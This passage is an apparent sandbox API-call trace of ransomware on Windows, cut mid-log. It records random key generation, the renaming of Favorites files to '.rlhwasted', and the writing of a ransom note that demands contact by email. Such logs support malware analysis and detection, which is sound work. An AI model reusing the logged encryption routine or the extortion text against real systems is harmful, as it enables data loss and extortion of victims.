KEY:\r\n[begin_key]HvAKXwOVHf47euVK8L1tVLEVrugoamHuwGP9eEPcGqH1/zfnci/LyVUD4dWHQBHH\r\nXgY0t2avzFunqq5SG7LmnSJxo7V8nxl5dxOX88D7qVA99I8WGvd5FM5NMx2EhjQ5\r\nGTnM1OGEs0WCX0YgaCkEdSUMgO80pvW6dm405uO7e+vGvADk+PJlvV7Sb2V0gQq6\r\nupSAjemBPtBz1QILGHck54GCAu2M6MmqRKZ4joLodZMmwkfAJmhHbKiFht9S9RRD\r\nFbQ+go6IWq8trXuwp+le3ObN7yTFPosc9wsu2qqhYsaaJxd5uiHUS9RxvIloKOwl\r\n0pIEmU2rT5meyE0BlHbrwbOzlai+396Z/0kt4R23M1zK2dR/rQA/MdcT8oJ0+Q+F\r\nxMip0rvUYV9XYbKtVFLz7SbBeoD8Jrl91Uufsm7L1OMTCWsEZRgMFd7Kdg0O6o/q\r\nmQGOJvqRqAGudI9zKnDG3TruQ8CsJssXjjIwHqeYDGMb0+kAViXlLbpY/fcIWKDk\r\nTO60MZUjK+8AzzT7LBOk/zQS2Q86o9v879sUgWJoIWdbP4YIwrwHaHehA0fb/N2S\r\ncLIEjcpoG6Kfx9acLB74RMhzVl6zvGSvzcSv9E3T5h//6q/ERRw1V5NnxkFUjttV\r\nkVbP2sPALJHnoT0kXxy0eyHcYyPwsZfOGkXKUkCWEwO=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.866] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.866] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.866] SetEndOfFile (hFile=0x108) returned 1 [0198.868] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.868] CloseHandle (hObject=0x108) returned 1 [0198.869] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0198.870] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b640 | out: hHeap=0x6b0000) returned 1 [0198.870] _aulldvrm () returned 0x0 [0198.870] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0198.871] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.871] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.871] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0198.871] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27c) returned 0x707f58 [0198.871] lstrcpyW (in: lpString1=0x707fca, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.871] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.871] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0198.872] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.872] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.873] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0198.874] SetEndOfFile (hFile=0x108) returned 1 [0198.874] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.874] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.874] lstrcpyW (in: lpString1=0x707fca, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.rlhwasted")) returned 1 [0198.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0198.875] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.875] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x85 [0198.875] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0198.875] CloseHandle (hObject=0x128) returned 1 [0198.878] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.878] CloseHandle (hObject=0x10c) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.878] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0198.879] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.879] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.879] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0198.880] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.880] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.891] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.891] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.891] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.891] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BVFx+TXTaExdSySiVjvOuEblgTJr1dwtRFYZGVyk76yVvbNZqsLdgfX/raed15sl\r\nNfQElzDSIBfsk+t2c9fxpvTQvuNxe8NnSUFNy0DgRjNvYHVazDkXyL9nTyZKUkH2\r\ncu6roquhVM00+zAIevqSFlEyOwgRzub8imEaV0p2sywsB0OE8xI9Rg9HhcCVZLYm\r\n1ZYIAVKVrZRbRbE0PiFD+zjsPfQM1Agvbyxb/alP5bdX756+wDFlY0mKBo6iZE1z\r\nlyQn4wqSeuCgF7XvQzQniEkwHlgZpwAU9lZDKbtlP/qKWcjW5NGOJM108p+DB1ZH\r\nc7buYBAymQ2xzKmHtXKzXEXjWP08QdSSyA0XddRKWqpsSSIEVkVgPFU0NTJlmVr9\r\ngyxvfYsPS0yKpp8c34x7avTVYpsBBjkNdsaK+T1VfXV1CAqbCCKUi89W6r/gWRTF\r\n8DcMrbysg9RP/dtY4curgbLfzzcDLGwvVijJqOYi16WbfMsYoaXi6D5gPMCqRnnY\r\n7rLpxYm/+O8kWvqmomCbC/DP9mjbY+KV1RtUK8spo998//0s/YSdJ3Plzc174ctz\r\ndA/cmHli0Zp93idCL3myhH/4qJyJua20vdhzX3Q0XoJKRSW8YNBqnBjGvr82ZIl5\r\nwhvs3zImrg9TC2dCUqiF7thB87Dqe3JHxW+pAbt8KCN=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.892] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.892] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.892] SetEndOfFile (hFile=0x108) returned 1 [0198.925] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.925] CloseHandle (hObject=0x108) returned 1 [0199.083] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x707f58 | out: hHeap=0x6b0000) returned 1 [0199.083] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706520 | out: hHeap=0x6b0000) returned 1 [0199.083] _aulldvrm () returned 0x0 [0199.083] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0199.084] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0199.084] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0199.084] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0199.084] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27c) returned 0x712fd0 [0199.084] lstrcpyW (in: lpString1=0x713042, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.085] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0199.085] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0199.085] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0199.085] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0199.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0199.086] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0199.088] SetEndOfFile (hFile=0x108) returned 1 [0199.088] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.088] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0199.088] lstrcpyW (in: lpString1=0x713042, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.rlhwasted")) returned 1 [0199.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0199.100] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0199.100] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x85 [0199.100] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.100] CloseHandle (hObject=0x128) returned 1 [0199.102] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.102] CloseHandle (hObject=0x10c) returned 1 [0199.102] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0199.102] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0199.103] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0199.103] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.103] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0199.104] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0199.104] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.115] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.116] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.116] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0199.116] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NXcVJqSxBOj+4s31LzMvJIRxPa76MwXw1PFOaIcrXpJWa/nQ0FEhGe1sgl0CmeBP\r\nHBt0sM5TQyKTvNa3jt9IK8q48trgUGnoqj8OSUd+G1XOHJX9RLj8ZJrvSPiGgMZL\r\nwk3UUsdmfdd+LEPTzFv1dVArnSeypfo1e7KCvUGve827Zzb7ulzK6hBWUFa7DvcK\r\nJw/+6wL0erQgmSoojuQTDIjkMVZfssK9jqfT7CyPDaIVgRwjJOu+W8QnJCEtk1a0\r\nFKDZhw1kwUPgsYmJsMVyk3q0RVv3aYu5k4mEzP1qDt5+LtLDpJq9S/3IgrYZ7Hv3\r\ni4IgtOKG0P9HU7UuHCWeHaDvgYd/IXJ2zjF31YnBpCjb2u0YaGTizk9F0l3iwlJ6\r\nE2hELIYtEtr0cy8kllMdImpIEuS6DjgjOKeVJ5hKUzT6dITO6HTEOEeYe0hQlo+H\r\n2meziL1RiD03sYduskrGWGdZrOiYv4ssPxmtD0B0enJRy38rC1PU4uVEBxRpnjP7\r\nXYG27GZbfUfPJpglO4vv1SLe/wQ3agQrGPtqIV8ZNDF2P0clWd/AYcAHZBfLMuAn\r\nrV5hBw0QGpjRqUTbi0qHmKMPp35uagN+VnnJv/2fmPPU85ElIVMZpT5DtB5Q9m6d\r\nfERMaB7DGo44Z7OnPdBkmpU+f0I6kF1eJkRzgmFUm6B=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.116] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.116] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0199.116] SetEndOfFile (hFile=0x108) returned 1 [0199.119] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0199.119] CloseHandle (hObject=0x108) returned 1 [0199.123] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0199.123] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7065f0 | out: hHeap=0x6b0000) returned 1 [0199.123] _aulldvrm () returned 0x0 [0199.123] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0199.124] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0199.124] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.124] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0199.124] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27e) returned 0x712fd0 [0199.124] lstrcpyW (in: lpString1=0x713044, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.124] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0199.124] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0199.125] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0199.125] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0199.126] WriteFile (in: hFile=0x108, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0199.127] SetEndOfFile (hFile=0x108) returned 1 [0199.128] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.128] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0199.200] lstrcpyW (in: lpString1=0x713044, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.rlhwasted")) returned 1 [0199.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0199.203] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0199.203] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x85 [0199.203] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.203] CloseHandle (hObject=0x128) returned 1 [0199.209] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.209] CloseHandle (hObject=0x10c) returned 1 [0199.209] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0199.209] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0199.210] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0199.210] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0199.210] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0199.211] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0199.211] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0199.222] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.222] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.222] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.222] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Vs/wQaXcJo+DDC6Ee2uCbvaFW20BRxRXBhtKoxMaVtcNikyK0EdI86bKASmyesZi\r\nlfEodnl7vMjS8RUvHDn6WAD7LvlSQtshEv/1V7BJ3OvxbxtpsYhzBowfTSOjJbSF\r\nkK0yo9zk2nFOHlAB9PoP8CFN9VjYNVuOdju40FyvdAYOzXjpxDzg3A4sCH/+nhXk\r\nE8XJeZLlqKvWo7LA6K0DVnn6ucc/PmOIT+gXYW2ASwcbyY+e1O0pEnKxckPU4YXa\r\n3AVyxmaUwXNWRn+5LbDtARagfImp6ak+GJNg7BAZGo5x1lrAXuMZmpUKMVoeDL2r\r\nPR7O+kxMlSdmBcNV25vQ/ILpesc2IagGvymUfXrKvoEay0J/BKZTEjH5kDO8hLhR\r\nBTBrPsdDEdsoyFeT4nWbMORF9vswFfKJUD8OtHkZeV8ex6h07GrhFxwxbOrpn8x1\r\nQaB3Yc5NSCL9cz+4AJH4t9oRRr2nXxHyI8N42ubbACtKOxWvxvRf3umO99rBJ8SM\r\npcP0GT7Za00Z145N4aED3OILDq3hnlWlSf6kkchJrUhYp+30i8AdfZ+GHxGrxatM\r\n1po5MgDC8c50raclBJ+Ka/ZLPmKjcPOZ9znT+e6XxvSLaU56CyStPOLlOsslnKPE\r\n2k4w6kYXJjzgotCWCbMvPmdehzv+2OEbrzOCYiGTMz+=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.222] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.222] WriteFile (in: hFile=0x108, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0199.222] SetEndOfFile (hFile=0x108) returned 1 [0199.225] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.225] CloseHandle (hObject=0x108) returned 1 [0199.227] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0199.227] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x7066c0 | out: hHeap=0x6b0000) returned 1 [0199.227] _aulldvrm () returned 0x0 [0199.227] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0199.228] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0199.228] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0199.228] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0199.228] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27e) returned 0x712fd0 [0199.229] lstrcpyW (in: lpString1=0x713044, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.229] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, 